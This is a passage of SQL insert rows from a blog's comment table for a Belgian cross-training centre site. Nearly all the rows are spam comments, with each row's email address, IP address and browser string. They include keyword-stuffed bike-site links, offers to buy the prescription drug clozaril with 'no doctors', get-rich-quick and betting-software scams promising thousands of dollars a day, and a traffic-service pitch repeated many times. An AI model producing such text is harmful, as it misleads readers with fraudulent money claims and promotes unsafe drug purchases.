(117, 1, 'PatrickSn', 'seroff.grigoriig@yandex.com', '', '95.139.116.91', '2014-12-22 10:17:45', '2014-12-22 10:17:45', '2 Blocks Tofu  mountain bike reviews specialized road bike brands bicycle <a href=\"http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html\" rel=\"nofollow\">mountain bike reviews</a> <a href=\"http://www.bikesizesforkids.com/tips-and-instructions-for-road-bike-sizing.html\" rel=\"nofollow\">road bike reviews forums</a> <a href=\"http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html\" rel=\"nofollow\">trek 820 mountain bike sizing</a> <a href=\"http://www.bikesizesforkids.com/tips-and-instructions-for-road-bike-sizing.html\" rel=\"nofollow\">road bike review for beginners</a> This Video Player Requires JavaScript. It has come to our attention that the browser you are using is either not running JavaScript or out of date. Please enable javascript and/or update your browser if possible.  http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html \r\n\"Our typical student is a perfectionist and loves words, loves language,\" said Ortiz. \"Many of our students have musical backgrounds. A lot of them have played the piano.\"  mountain bike reviews 2015 road bike review trek 1 1 <a href=\"http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html\" rel=\"nofollow\">mountain bike reviews full suspension</a> <a href=\"http://www.bikesizesforkids.com/tips-and-instructions-for-road-bike-sizing.html\" rel=\"nofollow\">cannondale road bike size calculator</a> By Will Carless, GlobalPost   http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html      <a href=\"http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html\" rel=\"nofollow\">mountain bikes walmart</a> <a href=\"http://www.bikesizesforkids.com/tips-and-instructions-for-road-bike-sizing.html\" rel=\"nofollow\">road bike size calculator inseam</a> \r\n \r\n<a href=\"http://thtml5.com/forum.php?mod=forumdisplay&amp;fid=40\" rel=\"nofollow\">mountain bikes online road bike reviews 2012 mountain bike reviews 2014 road bike brands wiki</a>\r\n<a href=\"http://www.army-new.ru/forum1/viewtopic.php?f=9&amp;t=9400\" rel=\"nofollow\">mountain bikes for sale road bike brands for beginners mountain bikes uk road bike brands list</a>\r\n<a href=\"http://www.baiheyuleguanwang.org/home.php?mod=space&amp;uid=4\" rel=\"nofollow\">mountain bike size for man road bike reviews uk mountain bikes on sale road bike wheel size calculator</a>\r\n<a href=\"http://www.trapmusicforums.com/viewtopic.php?f=1&amp;t=15016\" rel=\"nofollow\">specialized epic mountain bike sizing road bike brands list mountain bike size for man cannondale road bike size calculator</a>\r\n<a href=\"http://babyisking.com/home.php?mod=space&amp;uid=651411\" rel=\"nofollow\">mountain bike reviews 2014 road bike brands to avoid 29er mountain bike height road bike reviews under 1000</a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', '', 0, 0),
(118, 1, 'PumaRachel', 'rachellews@outlook.com', 'http://residence-hotel.ru/', '62.210.131.222', '2014-12-23 11:01:41', '2014-12-23 11:01:41', 'Bedankt voor de nuttige informatie . Wilt u uw blog toe te voegen aan bladwijzers', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36 OPR/26.0.1656.24', '', 0, 0),
(119, 1, 'WilliamMn', 'williamonem@yandex.com', 'http://clozapinecheaporder-xp252.soup.io', '195.154.168.235', '2015-01-09 23:10:05', '2015-01-09 23:10:05', 'online generic clozaril buying without a prescription ohio  <a href=\"http://buyclozarilcheap-zx145.soup.io\" rel=\"nofollow\">cost of clozaril tablet in llanfair caereinion</a>  clozaril gel e at nottingham  <a href=\"http://clozapinecheaporder-z416.soup.io\" rel=\"nofollow\">clozaril online mastercard fedex, purchase clozaril discount fast</a>  order clozaril zolafren no rx in thirsk  <a href=\"http://online-order-clozaril-dl403.soup.io\" rel=\"nofollow\">pharmacy clozaril tabs no doctors</a>  generic sales clozaril in cardiff  <a href=\"http://clozarilcheapbuy-d339.soup.io\" rel=\"nofollow\">clozaril online visa no doctors at looe</a>  clozaril ups c.o.d. at nm llano  <a href=\"http://cheap-clozaril-order-ul443.soup.io\" rel=\"nofollow\">low cost clozaril moneygram saturday delivery in illinois</a>  clozaril cheap clozaril  <a href=\"http://cheap-order-clozaril-dw338.soup.io\" rel=\"nofollow\">clozaril ziprasidone risperidone haloperidol</a>', 0, '0', 'Mozilla/5.0 (Windows NT 5.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', '', 0, 0),
(120, 1, 'PatriciaBeem seo manager', 'patricialinser@hotmail.com', 'http://next-gen-seo-traffic.com', '46.118.116.33', '2015-01-17 07:00:57', '2015-01-17 07:00:57', 'This is a very good tip particularly to those fresh to the blogosphere. Brief but very accurate info… Appreciate your sharing this one. A must read post!', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', '', 0, 0),
(121, 1, 'Abby', 'wzwceqwbsx@aol.com', 'http://cmyad.co/i/5b58', '23.232.158.140', '2015-01-21 05:34:09', '2015-01-21 05:34:09', 'I came to your Hello world! | Cross Training Center (Namur - Limelette) page and noticed you could have a lot more hits. I have found that the key to running a website is making sure the visitors you are getting are interested in your niche. There is a company that you can get visitors from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my site. Visit them here: http://anders.ga/1oahd', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(122, 1, 'Hannahcib', 'laura-ferksen89@outlook.com', 'http://skyrocket-web-traffic.com', '46.119.124.10', '2015-02-11 21:37:48', '2015-02-11 21:37:48', 'Hi www.crosstrainingcenter.be admin, noticed you have nice website and really liked your post. Not so many comments though, \r\nso just thought I could recommend you seo website http://skyrocket-web-traffic.com which will get hundreds and thousands laser targeted visitors from Google 1st page for your site in no time. They use only time tested and 1 year deep researched white hat methods which actually work in today\'s seo world. Have a nice day and hope next time I visit your site it will be lot more popular. \r\nRegards your friend Laura.', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36', '', 0, 0),
(123, 1, 'Jasminebal', 'jasmine-lucky777@outlook.com', 'http://12k-cash-software.com/Download.html', '178.137.162.171', '2015-02-23 20:08:06', '2015-02-23 20:08:06', 'Hi www.crosstrainingcenter.be admin I bet you wanna make more money? So how about \r\n \r\nthe insider secret software cashing $12,234 in 2 months? \r\nhttp://12k-cash-software.com/Download.html \r\n \r\nThat\'s what you can make and it is much more easy as internet marketing... \r\n \r\nLet me get it straight. \r\n \r\nI dont care about sports. Shame on me but I dont even know the \r\nfootball rules. Never cared less. \r\n \r\nWhat I care about is making money for me and my family. \r\n \r\nI tried everything from stocks &amp; forex to internet marketing and \r\naffiliate programs.. I even made some money but then blew it all away \r\nwhen the stock market went south. \r\n \r\nWhat I was looking is the long term solution that can give me an edge. \r\nI think I finally found it. It is called Z code system. \r\n \r\nZ Code is not about sports. It is about following the system and \r\nwinning in a long run. That is why it is called sports investing and \r\nnot gambling. \r\n \r\nGuys will send you game picks and the predictions from the insider \r\ninfo based on their precise statistical model proven since 1999. \r\n \r\nYou place the bets and win. That\'s it. \r\n \r\nDon\'t take my word on it. Check out the proof video here: \r\n \r\nhttp://12k-cash-software.com/Download.html \r\n \r\nThese guys combine the power of their human cappers who are experts in \r\nsports with the power of technology: statistical data since 1999. \r\nTheir wins are documented and proven - each winning and losing pick is \r\navailable for members to check and verify in the members zone. \r\n \r\nThe performance chart goes straight into profits. Over $12,000 usd \r\nprofit for average bet of $100 during the last 2 months! \r\n \r\nNo wonder... I mean, \r\n \r\neven if you are skeptical you really NEED to check out how transparent \r\nthese guys truly are... \r\nVideos of bank accounts stuffed with money, videos of bookmaker \r\naccounts, screenshots proving how effective this killer software is, \r\nvideos of how to make the money risk free, hundreds of real people \r\ntestimonials... \r\n \r\n...proof, proof, and more proof!!  All sitting there for you to \r\nabsorb! Don\'t take my word for it - you have to see it to believe it. \r\n \r\nhttp://12k-cash-software.com/Download.html \r\n \r\nAnd the best part about it is just how easy it is to use!  Everything \r\nabout this product is TOP class- \r\n \r\n- from the software itself \r\n- to the video tutorials showing how to use the software &amp; picks \r\n- to the comprehensive FAQ &amp; Money management tips \r\n- to the well trained support team lead by Anny. \r\n \r\nThese guys have everything covered! \r\n \r\nCheck it out for yourself: \r\n \r\nhttp://12k-cash-software.com/Download.html \r\n \r\n \r\nYour friend Jasmine', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 YaBrowser/14.10.2062.12061 Safari/537.36', '', 0, 0),
(124, 1, 'RebekavonO', 'rebeka-forken@outlook.com', 'http://get-high-pr-links.com', '37.115.189.79', '2015-03-09 04:25:21', '2015-03-09 04:25:21', 'Hi www.crosstrainingcenter.be admin did you know what’s the secret how big company sites get large targeted traffic and exposure in Google 1st page results for the most competitive keywords? \r\nHer\'s answer how you can get same massive targeted traffic to your blog and it is straigtforward - \r\n \r\nhigh PR backlinks - http://get-high-pr-links.com, but just good links which counts as votes for your website giving Google no option but to skyrocket your site search engine positions to results so your customers can find your website at the top of Google search results.  Today is your lucky day because I’m going to reveal you top resource of greatest of the greatest links from 500’000 website network! \r\n*buy Links from actual PR page websites with low outbound links maximum 10 \r\n* Skyrocket your site rankings for your related search term and get insane laser targeted traffic.  Buy high pr links at http://get-high-pr-links.com \r\nyour friend Rebeka.', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 YaBrowser/14.10.2062.12061 Safari/537.36', '', 0, 0),
(125, 1, 'Danielle', 'waftembxhy@hotmail.fr', 'http://pixz.nu/2fqB', '23.108.170.197', '2015-03-18 23:25:54', '2015-03-18 23:25:54', 'I discovered your Hello world! | Cross Training Center (Namur - Limelette) page and noticed you could have a lot more hits. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your niche. There is a company that you can get visitors from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my site. Check it out here: http://kout.eu/2y9i', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(126, 1, 'LindaOr', 'linda_sanchezter720@outlook.com', 'http://soft-making-half-million.com/downloadnow.html', '37.115.189.79', '2015-03-26 00:04:52', '2015-03-26 00:04:52', 'After getting more than 11000 visitors/day to my new website and earning $16452 first week I thought your www.crosstrainingcenter.be website also need  unstoppable flow of traffic &amp; money... \r\n \r\nUse this BRAND NEW software and get all the traffic for your website you will ever need ... \r\n \r\n= = &gt; &gt; http://soft-making-half-million.com/downloadnow.html \r\n \r\nIn testing phase it generated 867,981 visitors and $540,340. \r\n \r\nThen another $86,299.13 in 90 days to be exact. That\'s $958.88 a \r\nday!! \r\n \r\nAnd all it took was 10 minutes to set up and run. \r\n \r\nBut how does it work?? \r\n \r\nYou just configure the system, click the mouse button a few \r\ntimes, activate the software, copy and paste a few links and \r\nyou\'re done!! \r\n \r\nClick the link BELOW as you\'re about to witness a software that \r\ncould be a MAJOR turning point to your success. \r\n \r\n= = &gt; &gt; http://soft-making-half-million.com/downloadnow.html \r\nBest regards \r\nYour old friend Linda', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36', '', 0, 0),
(127, 1, 'Catherine', 'hpidwo@dayrep.com', 'http://s.ihaus.co.uk/x3', '104.168.70.17', '2015-04-10 03:33:44', '2015-04-10 03:33:44', 'Hi, my name is Catherine and I am the sales manager at StarSEO Marketing. I was just looking at your Hello world! | Cross Training Center (Namur - Limelette) website and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are interested in niches like yours. By getting your website on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can read more about it here: http://bbqr.me/ij - Now, let me ask you... Do you need your website to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your site on the network I am describing. This traffic service advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular sites are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Find out more here: http://1be.info/3o3a', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(128, 1, 'Catherine', 'menqhseqs@dayrep.com', 'http://bbqr.me/ij', '23.94.186.73', '2015-04-13 09:39:25', '2015-04-13 09:39:25', 'Hi, my name is Catherine and I am the sales manager at StarSEO Marketing. I was just looking at your Hello world! | Cross Training Center (Namur - Limelette) website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you didn\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are looking for niches like yours. By getting your website on this service you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://bbqr.me/ij - Now, let me ask you... Do you need your site to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the network I am describing. This traffic network advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular websites are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Find out more here: http://s.ihaus.co.uk/x3', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(129, 1, 'Olivie', 'jkweftbfj@hotmail.com', 'http://bbqr.me/mu', '104.168.67.69', '2015-04-22 18:25:59', '2015-04-22 18:25:59', 'Hi my name is Olivie and I just wanted to drop you a quick note here instead of calling you. I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more visitors. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get targeted visitors from and they let you try their service for free for 7 days. I managed to get over 300 targeted visitors to day to my site. Visit them here: http://tf3.info/uu', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(130, 1, 'Olivie', 'fgpoiz@hotmail.com', 'http://tf3.info/uu', '104.168.63.93', '2015-05-04 16:06:10', '2015-05-04 16:06:10', 'Hi my name is Olivie and I just wanted to drop you a quick note here instead of calling you. I came to your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more visitors. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your niche. There is a company that you can get targeted visitors from and they let you try the service for free for 7 days. I managed to get over 300 targeted visitors to day to my website. Visit them here: http://esyok.com/shirt/b9', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(131, 1, 'Delphine', 'lokskoqent@yahoo.co.uk', 'http://s.marcusmo.co.uk/5ot', '104.168.42.39', '2015-05-20 05:41:06', '2015-05-20 05:41:06', 'Hi, my name is Delphine and I am the marketing manager at SwingSEO Solutions. I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and most of the users are interested in topics like yours. By getting your site on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can read more about it here: http://zoy.bz/4nm - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted traffic who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your site on the service I am describing. This traffic service advertises you to thousands, while also giving you a chance to test the network before paying anything. All the popular blogs are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Read more here: http://txsc.us/t4bg - or to unsubscribe please go here: http://innovad.ws/8h9dp', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(132, 1, 'MichaelPr', 'ms_sophia_taylor@outlook.com', 'http://www.2000-usd-per-day.com/download.html', '46.119.112.121', '2015-05-26 14:33:42', '2015-05-26 14:33:42', 'Hi, www.crosstrainingcenter.be admin how about finally earning \r\n$1500-$2500/day without lifting a finger? \r\n \r\nIf making money online COULD be \r\nas easy as writing your own check… \r\n \r\nThis might be it. \r\nhttp://www.2000-usd-per-day.com/download.html \r\n \r\n3 minutes into the video? Yep. That’s \r\na $10000-$15000/week, right there. \r\n \r\n… All made with virtually no effort. \r\n \r\nWatch it and see for yourself. Download and copy exact system for yourself here: \r\nhttp://www.2000-usd-per-day.com/download.html \r\n \r\nYour old friend Sophia', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36', '', 0, 0),
(133, 1, 'money for surveys', 'karen-garcia@hotmail.com', 'http://www.take-surveys-earn-cash.com/surveys.html', '46.118.158.187', '2015-06-09 20:33:52', '2015-06-09 20:33:52', 'Earn up to $3500/month just answering simple surveys \r\nAverage people just like you are earning ~3500usd month just for taking simple surveys.... \r\nnow it\'s your time \r\nhttp://www.take-surveys-earn-cash.com/surveys.html \r\nHi www.crosstrainingcenter.be admin just wanted to let you know \r\n \r\nThere\'s an incredible new opportunity \r\nthat just grabbed my attention! \r\n \r\nIt\'s almost too good to be true. Big \r\ncompanies are paying people just for giving \r\ntheir opinions! I can\'t believe this guy and others are cashing out money just for filling out simple surveys read here how they are doing this: \r\n \r\nhttp://www.take-surveys-earn-cash.com/surveys.html \r\n \r\n \r\nThat\'s right! I\'m not kidding, all you\'ve got \r\nto do is complete simple surveys and these \r\ncompanies will pay you fat cash for it and it does not mater form which country you are, they need people from all over world! \r\n \r\nYou\'ve got to see this in video. \r\n \r\nhttp://www.take-surveys-earn-cash.com/surveys.html \r\n \r\nBut the truth is... they\'re not letting \r\nvery many people join the program so \r\nyou\'ve got to hurry! \r\n \r\nSee you there! \r\nyour old friend! \r\nKaren', 0, '0', 'Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.17', '', 0, 0),
(134, 1, 'moving companies', 'ayjbiel@gmail.com', 'http://pepperhome.ru/?option=com_k2&amp;view=itemlist&amp;task=user&amp;id=98720', '78.244.88.55', '2015-06-17 21:14:59', '2015-06-17 21:14:59', 'Superb post however I was wondering if you could write a litte more on this topic? I\'d be very grateful if you could elaborate a little bit more. Appreciate it!|', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(135, 1, 'moving interstate australia', 'goslcsdxc@gmail.com', 'http://bgnovinata.com/component/k2/itemlist/user/127115', '213.220.219.150', '2015-06-18 20:24:49', '2015-06-18 20:24:49', 'I have been browsing online more than 4 hours today, yet I never found any interesting article like yours. It is pretty worth enough for me. In my view, if all webmasters and bloggers made good content as you did, the net will be a lot more useful than ever before.|', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(136, 1, 'Donna', 'yzeatkzl@tom.com', 'http://www.kaktusit.com/a252', '107.172.6.73', '2015-07-20 09:27:59', '2015-07-20 09:27:59', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and most of the users are interested in topics like yours. By getting your site on this network you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can find out more about it here: http://gf10.com.br/url/iq2f - Now, let me ask you... Do you need your website to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your website on the network I am talking about. This traffic service advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular blogs are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Read more here: http://cabkit.in/e137', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(137, 1, 'Donna', 'wuxlqivgs@tom.com', 'http://www.kaktusit.com/a252', '172.245.120.6', '2015-07-29 15:57:41', '2015-07-29 15:57:41', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and most of the users are interested in topics like yours. By getting your website on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can find out more about it here: http://bbqr.me/4fj5 - Now, let me ask you... Do you need your site to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your website on the network I am talking about. This traffic service advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular sites are using this network to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Find out more here: http://www.kaktusit.com/a252', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(138, 1, 'Donna', 'xnqzfry@tom.com', 'http://bbqr.me/4fj5', '23.94.170.143', '2015-08-05 22:22:38', '2015-08-05 22:22:38', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you didn\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are looking for websites like yours. By getting your website on this network you have a chance to get your site more popular than you can imagine. It is free to sign up and you can read more about it here: https://spna.ca/1pvm - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the network I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the network before paying anything. All the popular sites are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Read more here: http://www.urlator.co/w7uk', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(139, 1, 'Valerie', 'jztmaaxqwks@tom.com', 'http://digitalvikn.com.br/u/nk00', '23.94.170.211', '2015-08-12 08:49:20', '2015-08-12 08:49:20', 'I was just looking at your Hello world! | Cross Training Center (Namur) site and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and the majority of the users are looking for topics like yours. By getting your site on this service you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can find out more about it here: http://ittsy.com/it/3x - Now, let me ask you... Do you need your website to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your site on the service I am talking about. This traffic service advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular sites are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Read more here: http://www.urlator.co/w7uk', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(140, 1, 'Valerie', 'eahmfzixp@tom.com', 'http://www.urlator.co/w7uk', '23.94.173.64', '2015-08-20 20:32:25', '2015-08-20 20:32:25', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and the majority of the users are looking for topics like yours. By getting your site on this network you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can find out more about it here: http://www.urlator.co/w7uk - Now, let me ask you... Do you need your website to be successful to maintain your business? Do you need targeted traffic who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the service I am describing. This traffic service advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular blogs are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Read more here: http://bbqr.me/4fj5', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(141, 1, 'Lindsey', 'vzigsng@tom.com', 'https://spna.ca/1pvm', '23.95.196.194', '2015-09-09 13:01:56', '2015-09-09 13:01:56', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to get a lot of visitors. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are looking for topics like yours. By getting your website on this network you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://digitalvikn.com.br/u/nk00 - Now, let me ask you... Do you need your site to be successful to maintain your business? Do you need targeted traffic who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the network I am describing. This traffic network advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular blogs are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Read more here: http://www.arvut.org/1/dft', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(142, 1, 'Lindsey', 'wxaawanejq@tom.com', 'http://ittsy.com/it/3x', '23.94.173.64', '2015-09-17 01:49:37', '2015-09-17 01:49:37', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and most of the users are looking for websites like yours. By getting your website on this service you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://tgi.link/dcf2 - Now, let me ask you... Do you need your site to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your site on the network I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular websites are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Read more here: http://www.arvut.org/1/dft', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(143, 1, 'Lindsey', 'ffsspscbio@tom.com', 'http://ittsy.com/it/3x', '107.173.168.72', '2015-09-26 14:20:29', '2015-09-26 14:20:29', 'I was just looking at your Hello world! | Cross Training Center (Namur) site and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you didn\'t already know... There is a website network which already has more than 16 million users, and the majority of the users are looking for websites like yours. By getting your website on this service you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://bbqr.me/4fj5 - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your site on the service I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the service before paying anything. All the popular sites are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Find out more here: http://tgi.link/dcf2', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(144, 1, 'Lindsey', 'wcablahyt@tom.com', 'http://tgi.link/dcf2', '23.94.170.211', '2015-10-10 01:38:14', '2015-10-10 01:38:14', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to get a lot of visitors. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are interested in topics like yours. By getting your site on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can find out more about it here: http://tgi.link/dcf2 - Now, let me ask you... Do you need your website to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the network I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the service before paying anything. All the popular websites are using this service to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Find out more here: http://tgi.link/dcf2', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
